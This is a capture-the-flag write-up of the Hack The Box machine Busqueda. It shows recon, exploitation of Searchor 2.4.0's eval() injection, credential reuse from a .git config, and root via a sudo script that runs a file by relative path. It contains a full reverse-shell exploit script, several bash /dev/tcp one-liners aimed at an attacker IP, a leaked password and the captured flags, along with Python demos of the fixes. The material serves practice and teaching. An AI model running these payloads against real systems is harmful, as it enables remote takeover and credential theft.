Contents
Connect to the HTB server and start the target
Scan the target's open ports with nmap
Fuzz paths on the domain with ffuf
Open the target's port-80 home page in a browser
Look for a public PoC/EXP on GitHub
USER_FLAG:0f2686aebbdb4c728050281a6fb742cf
Privilege escalation
ROOT_FLAG:dde68ef0288190408c0c3eb102398590
Connect to the HTB server and start the target
Target IP: 10.10.11.208
Assigned IP: 10.10.16.22
Scan the target's open ports with nmap
nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.208
The target has two open ports: 22 and 80. Start with port 80
curl -I http://10.10.11.208:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.208:80
HTTP/1.1 302 Found
Date: Fri, 01 Nov 2024 06:04:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://searcher.htb/
Content-Type: text/html; charset=iso-8859-1
The request is redirected straight to the domain searcher.htb
So bind the target IP to that name
echo '10.10.11.208 searcher.htb' >> /etc/hosts
Request the domain with curl again
curl -I http://searcher.htb/
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://searcher.htb/
HTTP/1.1 200 OK
Date: Fri, 01 Nov 2024 06:06:14 GMT
Server: Werkzeug/2.1.2 Python/3.10.6
Content-Type: text/html; charset=utf-8
Content-Length: 13519
Fuzz paths on the domain with ffuf
ffuf -u http://searcher.htb/FUZZ -w ../dictionary/common.txt
Open the target's port-80 home page in a browser
Scroll to the bottom of the page: there is a search box and a drop-down to choose the search engine
Try sqlmap on it anyway (even though this input almost certainly never touches a database)
sqlmap -r .\temp.txt --batch --dbs
As expected, nothing: both parameters are just forwarded to the chosen search engine
At the bottom of the page the Searchor version is shown: 2.4.0
Clicking it leads to the project's GitHub release page; open the list of all releases
Release v2.4.2 notes a vulnerability fix; open it for details
View the details of the fix
View the changed code
@click.argument("query")
def search(engine, query, open, copy):
    try:
        # removed in v2.4.2: engine, query, copy and open are interpolated into
        # Python source text and handed to eval()
        url = eval(
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )
        # added in v2.4.2: look the engine up by name and pass query as a plain value
        url = Engine[engine].search(query, copy_url=copy, open_web=open)
        click.echo(url)
        searchor.history.update(engine, query, url)
        if open:
No further code review here. The point is that query is pasted, unescaped, into a string that is passed to eval(), so a query containing a single quote closes the literal and whatever follows is executed as Python. Readers who want the details should study how that .py file is code-injectable
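To make the break-out concrete, here is an added illustration (not searchor's own code and not part of the original page): a small stand-in Engine enum, the pre-2.4.2 eval() form beside the 2.4.2 lookup form, and a payload with the same structure as the public exploit's evil_cmd, except that it appends to a list instead of calling os.system() so the effect can be observed offline. The Engine class, SIDE_EFFECTS, and the function names are constructed for this example.

```python
"""Reconstruction of Searchor's eval() injection: why a single quote in `query`
escapes the string literal, and why the v2.4.2 form does not. Added example;
the Engine enum below is a stand-in, not searchor's real one."""
from enum import Enum
from urllib.parse import quote

# Side effects recorded by the injected payload, standing in for os.system()
SIDE_EFFECTS = []


class Engine(Enum):
    """Stand-in for searchor.Engine: member name -> URL template (constructed)."""
    Google = "https://www.google.com/search?q={}"
    Bing = "https://www.bing.com/search?q={}"

    def search(self, query, copy_url=False, open_web=False):
        return self.value.format(quote(query, safe=""))


def search_vulnerable(engine, query, copy=False, open=False):
    """Pre-2.4.2 shape: user input becomes Python source and is eval()'d."""
    return eval(
        f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
    )


def search_fixed(engine, query, copy=False, open=False):
    """2.4.2 shape: engine is a name lookup (KeyError on junk), query is a value."""
    return Engine[engine].search(query, copy_url=copy, open_web=open)


# Same structure as the exploit's evil_cmd: close the string literal, add an extra
# positional argument that runs arbitrary code, close the call, comment out the rest.
PAYLOAD = "', SIDE_EFFECTS.append('code ran during search')) # junky comment"


def run_demo():
    """Run the payload through both versions and report what each one did."""
    SIDE_EFFECTS.clear()
    vuln_url = search_vulnerable("Google", PAYLOAD)
    vuln_effects = list(SIDE_EFFECTS)

    SIDE_EFFECTS.clear()
    fixed_url = search_fixed("Google", PAYLOAD)
    fixed_effects = list(SIDE_EFFECTS)

    # The fixed lookup also rejects an engine name that is not an enum member,
    # closing the second injection point (`Engine.{engine}`) as well.
    try:
        search_fixed("Google.__class__", "x")
        bad_engine_rejected = False
    except KeyError:
        bad_engine_rejected = True

    return {
        "vuln_url": vuln_url,
        "vuln_side_effects": vuln_effects,
        "fixed_url": fixed_url,
        "fixed_side_effects": fixed_effects,
        "bad_engine_rejected": bad_engine_rejected,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

In the vulnerable path the generated expression becomes Engine.Google.search('', SIDE_EFFECTS.append(...)) followed by a comment, so the appended marker proves the injected code ran and the returned URL carries an empty query. In the fixed path the whole payload is URL-encoded into the query string and nothing executes.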
Look for a public PoC/EXP on GitHub
#!/bin/bash -
# Public reverse-shell PoC for Searchor <= 2.4.2, lightly commented.
# Usage: ./exploit.sh <TARGET> <ATTACKER> [PORT]
default_port="9001"
port="${3:-$default_port}"
# Stage 1: the reverse shell, base64-encoded so its quotes and slashes survive inside the eval() string
rev_shell_b64=$(echo -ne "bash -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
# Stage 2: the injected query. The leading ' closes the string literal in
# eval(f"Engine.{engine}.search('{query}', ...)"), the extra argument calls os.system(),
# and "# junky comment" comments out the remainder of the generated expression
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"
echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"
# base64 may emit '+', which a form-encoded POST body would decode as a space; escape it
if [ -z "${evil_cmd##*$plus*}" ]
then
evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi
if [ $# -ge 2 ]
then
echo "[*] Input target is $1"
echo "[*] Input attacker is $2:${port}"
echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
else
echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example:
./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
fi
Start an nc listener on the attacking machine
nc -lvnp 1425
Run the exploit script
bash exploit.sh http://searcher.htb/ 10.10.14.11 1425
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.208] 48886
bash: cannot set terminal process group (1639): Inappropriate ioctl for device
bash: no job control in this shell
svc@busqueda:/var/www/app$ whoami
whoami
svc
List all files in the current directory
ls -a
svc@busqueda:/var/www/app$ ls -a
ls -a
. .. app.py .git templates
Enter the .git directory
svc@busqueda:/var/www/app$ cd .git
cd .git
svc@busqueda:/var/www/app/.git$ ls
ls
branches config HEAD index logs refs
COMMIT_EDITMSG description hooks info objects
View the contents of the config file
svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
remote = origin
merge = refs/heads/main
The random-looking string after the username in the remote URL is cody's Gitea password, committed into the repository's config. Credentials like this are often reused, so try it for an SSH login as the current user (svc)
ssh svc@10.10.11.208
Account: svc
Password: jh1usoih2bkjaspwe92
Locate user_flag and read its contents
svc@busqueda:~$ find / -name 'user.txt' 2>/dev/null
/home/svc/user.txt
svc@busqueda:~$ cat /home/svc/user.txt
0f2686aebbdb4c728050281a6fb742cf
USER_FLAG:0f2686aebbdb4c728050281a6fb742cf
Privilege escalation
Check which commands the current user may run with sudo
sudo -l
svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
Try running the command exactly as listed, with sudo
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup
It wants an action argument, so use full-checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
The output only says something went wrong, so change into the script's directory to look around
cd /opt/scripts/
svc@busqueda:~$ cd /opt/scripts/
svc@busqueda:/opt/scripts$ ls
check-ports.py full-checkup.sh install-flask.sh system-checkup.py
Run the same sudo command again from this directory and it now succeeds
That strongly suggests the full-checkup action invokes full-checkup.sh by a relative path, i.e. from whatever the current working directory happens to be, rather than from /opt/scripts
Go back to the directory svc lands in after SSH login (its home)
cd ~
Create a new full-checkup.sh there containing a reverse-shell payload (the same bash /dev/tcp one-liner the Searchor exploit used, pointing back at the attacking machine) and make it executable
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.11/1425 0>&1' > full-checkup.sh;chmod +x full-checkup.sh
Start an nc listener on the attacking machine
nc -lvnp 1425
Run the privileged command from the home directory
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
A root shell comes back
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.208] 40774
root@busqueda:/home/svc# whoami
whoami
root
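The page never shows /opt/scripts/system-checkup.py itself, so the following is an added reconstruction (not the box's script) of the bug its behaviour implies: an action that runs ./full-checkup.sh relative to the caller's working directory, next to a hardened version that uses an absolute path under a root-owned directory and refuses to run a writable or foreign-owned copy. The directory layout, the script bodies and the function names are constructed for the demo; expected_uid is parameterised only so the demo can run unprivileged, and would be 0 in the real script.

```python
"""Relative-path script execution under sudo: reproduce the three observations from
the box (failure from $HOME, success from /opt/scripts, hijack after planting a file
in $HOME) and show a fixed version. Added example, not the real system-checkup.py."""
import os
import stat
import subprocess
import tempfile

SCRIPT_NAME = "full-checkup.sh"


def write_script(directory, body):
    """Drop an executable full-checkup.sh into `directory` (constructed fixture)."""
    path = os.path.join(directory, SCRIPT_NAME)
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + body + "\n")
    os.chmod(path, 0o700)
    return path


def full_checkup_vulnerable(cwd):
    """Assumed shape of the original action: './full-checkup.sh' is resolved against
    the caller's cwd, so whatever file sits there runs (as root, through sudo)."""
    try:
        proc = subprocess.run(["./" + SCRIPT_NAME], cwd=cwd,
                              capture_output=True, text=True, check=True)
        return proc.stdout.strip()
    except (OSError, subprocess.CalledProcessError):
        # Matches the "Something went wrong" seen when run from /home/svc
        return "Something went wrong"


def full_checkup_hardened(cwd, trusted_dir, expected_uid=0):
    """Fix: absolute path into a trusted directory, plus an ownership and
    permission check so a writable copy can never be substituted."""
    script = os.path.join(trusted_dir, SCRIPT_NAME)
    st = os.lstat(script)                      # lstat: do not follow a planted symlink
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{script} is not a regular file")
    if st.st_uid != expected_uid or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(
            f"{script} must be owned by uid {expected_uid} and not group/world-writable")
    proc = subprocess.run([script], cwd=cwd, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def run_demo():
    """Stand-ins for /opt/scripts and /home/svc live in temporary directories."""
    with tempfile.TemporaryDirectory() as opt_scripts, \
            tempfile.TemporaryDirectory() as svc_home:
        write_script(opt_scripts, "echo legitimate checkup")
        results = {
            "vuln_from_home_before_plant": full_checkup_vulnerable(svc_home),
            "vuln_from_opt_scripts": full_checkup_vulnerable(opt_scripts),
        }
        # The escalation step: svc writes its own full-checkup.sh into its home
        write_script(svc_home, "echo HIJACKED: attacker script ran")
        results["vuln_from_home_after_plant"] = full_checkup_vulnerable(svc_home)
        results["hardened_from_home_after_plant"] = full_checkup_hardened(
            svc_home, opt_scripts, expected_uid=os.getuid())
        # The hardened version also refuses a trusted script that became writable
        os.chmod(os.path.join(opt_scripts, SCRIPT_NAME), 0o777)
        try:
            full_checkup_hardened(svc_home, opt_scripts, expected_uid=os.getuid())
            results["hardened_rejects_writable"] = False
        except PermissionError:
            results["hardened_rejects_writable"] = True
        return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The absolute path alone removes the cwd dependence; the ownership and mode check is what stops the next variant, where /opt/scripts or the script itself is left writable by the low-privilege user.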
Locate root_flag and read its contents
root@busqueda:/home/svc# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@busqueda:/home/svc# cat /root/root.txt
cat /root/root.txt
dde68ef0288190408c0c3eb102398590